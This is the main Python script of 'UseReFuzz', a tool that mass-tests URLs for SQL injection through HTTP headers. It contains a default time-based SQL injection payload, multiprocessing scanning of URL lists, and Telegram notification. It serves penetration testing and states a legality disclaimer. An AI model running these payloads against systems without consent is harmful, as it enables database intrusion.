| 1 | + | #!/usr/bin/env python3 |
| 2 | + | try: |
| 3 | + | from __init__ import header_injector , multi_payload |
| 4 | + | except: |
| 5 | + | from userefuzz import header_injector , multi_payload |
| 6 | + | |
| 7 | + | import colorama |
| 8 | + | import argparse |
| 9 | + | import os |
| 10 | + | import datetime |
| 11 | + | import configparser |
| 12 | + | import multiprocessing as mp |
| 13 | + | import sys |
| 14 | + | from functools import partial |
| 15 | + | |
| 16 | + | # For Colouring on Windows based OS |
| 17 | + | colorama.init() |
| 18 | + | |
| 19 | + | VERSION = '2.1.0' |
| 20 | + | class bcolors: |
| 21 | + | HEADER = '\033[95m' |
| 22 | + | OKBLUE = '\033[94m' |
| 23 | + | OKCYAN = '\033[96m' |
| 24 | + | OKGREEN = '\033[92m' |
| 25 | + | WARNING = '\033[93m' |
| 26 | + | FAIL = '\033[91m' |
| 27 | + | ENDC = '\033[0m' |
| 28 | + | BOLD = '\033[1m' |
| 29 | + | UNDERLINE = '\033[4m' |
| 30 | + | SLANT = '\x1B[3m' |
| 31 | + | |
| 32 | + | # Banner |
| 33 | + | banner=f""" |
| 34 | + | {bcolors.FAIL} ( ( |
| 35 | + | {bcolors.WARNING} )\ {bcolors.FAIL}) ){bcolors.WARNING}\ ) |
| 36 | + | ( ({bcolors.FAIL} (()/( ( ({bcolors.WARNING}(){bcolors.FAIL}/( {bcolors.WARNING}( |
| 37 | + | )\ ( ){bcolors.FAIL})\ /(_))){bcolors.WARNING})\ /(_)){bcolors.FAIL}))\ ({bcolors.WARNING} ( |
| 38 | + | _ ((_))\ /{bcolors.FAIL}((_|_)) /{bcolors.WARNING}((_|_{bcolors.FAIL}))_/((_{bcolors.WARNING}))\ )\ {bcolors.OKBLUE} |
| 39 | + | | | | ((_|_)) | _ (_)) | |_(_))(((_|(_) |
| 40 | + | | |_| (_-< -_)| / -_)| __| || |_ /_ / |
| 41 | + | \___//__|___||_|_\___||_| \_,_/__/__| {bcolors.SLANT}{bcolors.UNDERLINE}V {VERSION}{bcolors.ENDC} {bcolors.SLANT}{bcolors.UNDERLINE}@github.com/root-tanishq{bcolors.ENDC} |
| 42 | + | |
| 43 | + | {bcolors.OKBLUE} |
| 44 | + | [ 💉💉💉 {bcolors.ENDC}{bcolors.BOLD} Basic Header SQLI Injection Tester{bcolors.OKBLUE} 💉💉💉 ]{bcolors.ENDC} |
| 45 | + | """ |
| 46 | + | |
| 47 | + | print(banner) |
| 48 | + | |
| 49 | + | # Arguments |
| 50 | + | parser = argparse.ArgumentParser() |
| 51 | + | parser.add_argument('-l','--list', type=str,help=f'📄_List of URL to check for Header SQL Injection \t \t {bcolors.BOLD} {bcolors.OKBLUE}-l urllist.txt{bcolors.ENDC}',default="NO_LIST") |
| 52 | + | parser.add_argument('-p','--proxy', type=str,help=f'✈️ _Burp proxy or any other proxy to send the request \t \t{bcolors.BOLD} {bcolors.OKBLUE} -p http://127.1:8080{bcolors.ENDC}',default="NO_PROXY") |
| 53 | + | parser.add_argument('-m','--message', type=str,help=f'✉️ _Send a message in header for ease of search in Burp history \t \t{bcolors.BOLD} {bcolors.OKBLUE} -m "Just Testing SQLI"{bcolors.ENDC}',default="Testing for SQLI in User-Agent and Referer Header") |
| 54 | + | parser.add_argument('-s','--sleep', type=int,help=f'😴_How much sleep is used in your custom payload \t \t{bcolors.BOLD} {bcolors.OKBLUE} -s 12 {bcolors.ENDC} Default Sleep = 10' , default=10) |
| 55 | + | parser.add_argument('-v','--verbose', help=f'💣_Display All URLs and output \t \t{bcolors.BOLD} {bcolors.OKBLUE} -v {bcolors.ENDC}', action='store_true' , default=False) |
| 56 | + | parser.add_argument('-t','--telify', help=f'💬_Notify on telegram (https://github.com/root-tanishq/telify configuration file required) \t \t{bcolors.BOLD} {bcolors.OKBLUE} -t {bcolors.ENDC}', action='store_true' , default=False) |
| 57 | + | parser.add_argument('-o','--output', type=str,help=f'📁_Save the vulnerable URLs to an output file \t \t{bcolors.BOLD} {bcolors.OKBLUE} -o savefile {bcolors.ENDC}', default="NO_OUTPUT") |
| 58 | + | parser.add_argument('-u','--url', type=str,help=f'🤖_Pass a URL to check for Header SQLI Injections \t \t{bcolors.BOLD} {bcolors.OKBLUE} -u http://domain.tld/index.php {bcolors.ENDC}', default='NO_URL') |
| 59 | + | parser.add_argument('-ch','--customheader', type=str,help=f'🔒_Custom Header for SQLI Injections (For Multiple Header seperate them with | )\t \t{bcolors.BOLD} {bcolors.OKBLUE} FOR ONE HEADER: -ch X-Auth FOR MULTIPLE HEADER: -ch "X-Auth|X-Test|Bearer|Custom_HEAD" {bcolors.ENDC}', default="NO_CUSTOM_HEADER") |
| 60 | + | parser.add_argument('-w','--workers', type=int,help=f'👷_No. of workers (Processes) at a time \t \t{bcolors.BOLD} {bcolors.OKBLUE}-w 10 {bcolors.ENDC}\t \t Default Workers = 5',default=5) |
| 61 | + | parser.add_argument('-i','--inject', type=str,help=f"""💉_Send your custom payload Or a file of payloads for SQL Injection \t \t{bcolors.BOLD} {bcolors.OKBLUE} -i "'+sleep(10)+'" -i sqli_payloads.txt{bcolors.ENDC} """ , default='"XOR(if(now()=sysdate(),sleep(10),0))XOR"') |
| 62 | + | args = parser.parse_args() |
| 63 | + | |
| 64 | + | # Telify |
| 65 | + | CHAT_ID = '' |
| 66 | + | API_TOKEN = '' |
| 67 | + | is_telify_main = 'TELIFY_DOWN' |
| 68 | + | if args.telify: |
| 69 | + | try: |
| 70 | + | config = configparser.ConfigParser() |
| 71 | + | config.read(os.path.join(os.path.expanduser( '~' ),'telify.ini')) |
| 72 | + | CHAT_ID = config['TELIFY']['CHATID'] |
| 73 | + | API_TOKEN = config['TELIFY']['APITOKEN'] |
| 74 | + | telifyurl = f'https://api.telegram.org/bot{API_TOKEN}/sendMessage' |
| 75 | + | requests.post(telifyurl, json={'chat_id': CHAT_ID, 'text': f'[💡] (USEREFUZZ) Runned on (⏲️) {datetime.datetime.now()} ⏬'}) |
| 76 | + | is_telify_main = 'TELIFY_UP' |
| 77 | + | except: |
| 78 | + | print(f"😺{bcolors.WARNING}_No Configuration found , setup telify now => {bcolors.ENDC}{bcolors.BOLD} https://github.com/root-tanishq/telify {bcolors.ENDC}") |
| 79 | + | |
| 80 | + | if args.customheader != 'NO_CUSTOM_HEADER': |
| 81 | + | print(f'{bcolors.BOLD}{bcolors.OKGREEN}[{bcolors.ENDC}##{bcolors.BOLD}{bcolors.OKGREEN}]{bcolors.ENDC}',' Headers which UseReFuzz using for injection',bcolors.BOLD,bcolors.OKBLUE, args.customheader.replace('|',', '),bcolors.ENDC) |
| 82 | + | print() |
| 83 | + | else: |
| 84 | + | print(f'{bcolors.BOLD}{bcolors.OKGREEN}[{bcolors.ENDC}##{bcolors.BOLD}{bcolors.OKGREEN}]{bcolors.ENDC}',' Headers which UseReFuzz using for injection',bcolors.BOLD,bcolors.OKBLUE,'User-Agent, X-Forwarded-For, Referer',bcolors.ENDC) |
| 85 | + | print() |
| 86 | + | |
| 87 | + | if args.output != "NO_OUTPUT": |
| 88 | + | print(f'{bcolors.BOLD} 📂 Logging Output of UseReFuzz to => {args.output}.md \n') |
| 89 | + | file = open(args.output + ".md","w") |
| 90 | + | # Custom Header |
| 91 | + | if args.customheader != 'NO_CUSTOM_HEADER': |
| 92 | + | output_ch = args.customheader.replace('|',', ') |
| 93 | + | else: |
| 94 | + | output_ch = 'User-Agent, X-Forwarded-For, Referer' |
| 95 | + | file.write(f""" |
| 96 | + | # UseReFuzz HEADER SQLI INJECTION REPORT |
| 97 | + | |
| 98 | + | ## Author - Tanishq Rathore (Kun) |
| 99 | + | ## Github - https://github.com/root-tanishq/userefuzz |
| 100 | + | ## Twitter - https://twitter.com/root_tanishq |
| 101 | + | |
| 102 | + | > UseReFuzz runned on `{datetime.datetime.now()}` |
| 103 | + | |
| 104 | + | ## Legality |
| 105 | + | |
| 106 | + | ``` |
| 107 | + | Usage of userefuzz for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program |
| 108 | + | ``` |
| 109 | + | |
| 110 | + | - Headers `{output_ch}` |
| 111 | + | |
| 112 | + | - Sleep used for checking `{args.sleep}` |
| 113 | + | |
| 114 | + | # Report Results |
| 115 | + | | TIME TAKEN | URL | IS VULNERABLE | PAYLOAD | |
| 116 | + | | --- | --- | --- | --- | |
| 117 | + | """) |
| 118 | + | file.close() |
| 119 | + | |
| 120 | + | def main(): |
| 121 | + | if args.url != "NO_URL": |
| 122 | + | multi_payload(args.url,args.customheader,args.inject,args.message,args.proxy,args.output,API_TOKEN,CHAT_ID,is_telify_main,args.verbose,args.sleep) |
| 123 | + | elif args.list != "NO_LIST": |
| 124 | + | try: |
| 125 | + | urllist = filter(None , open(args.list,'r').read().split("\n")) |
| 126 | + | with mp.Pool(args.workers) as worker: |
| 127 | + | multi_fuzz = partial(multi_payload, custom_header_mp=args.customheader,injection_payload_mp=args.inject,userefuzz_message_mp=args.message,http_proxy_mp=args.proxy,output_mp=args.output,telify_APITOKEN_mp=API_TOKEN,telify_CHATID_mp=CHAT_ID,is_telify_mp=is_telify_main,verbose_mp=args.verbose,sleep_time_mp=args.sleep) |
| 128 | + | worker.map(multi_fuzz , urllist) |
| 129 | + | except KeyboardInterrupt: |
| 130 | + | exit(0) |
| 131 | + | except: |
| 132 | + | if os.path.isfile(args.list): |
| 133 | + | exit(0) |
| 134 | + | else: |
| 135 | + | print(f'😥{bcolors.BOLD}{bcolors.FAIL}_We are unable to read the file or the file does not exist{bcolors.ENDC}') |
| 136 | + | elif not sys.stdin.isatty(): |
| 137 | + | try: |
| 138 | + | urlfile = [] |
| 139 | + | for line in sys.stdin: |
| 140 | + | try: |
| 141 | + | urlfile.append(line.split()[0]) |
| 142 | + | except: |
| 143 | + | pass |
| 144 | + | with mp.Pool(args.workers) as worker: |
| 145 | + | multi_fuzz = partial(multi_payload, custom_header_mp=args.customheader,injection_payload_mp=args.inject,userefuzz_message_mp=args.message,http_proxy_mp=args.proxy,output_mp=args.output,telify_APITOKEN_mp=API_TOKEN,telify_CHATID_mp=CHAT_ID,is_telify_mp=is_telify_main,verbose_mp=args.verbose,sleep_time_mp=args.sleep) |
| 146 | + | worker.map(multi_fuzz , urlfile) |
| 147 | + | except KeyboardInterrupt: |
| 148 | + | exit(0) |
| 149 | + | except: |
| 150 | + | exit(0) |
| 151 | + | else: |
| 152 | + | print(f"😺{bcolors.WARNING}_No Option Provided please check {bcolors.ENDC}{bcolors.BOLD}# userefuzz --help {bcolors.ENDC}") |
| 153 | + | |
| 154 | + | if __name__ == '__main__': |
| 155 | + | main() |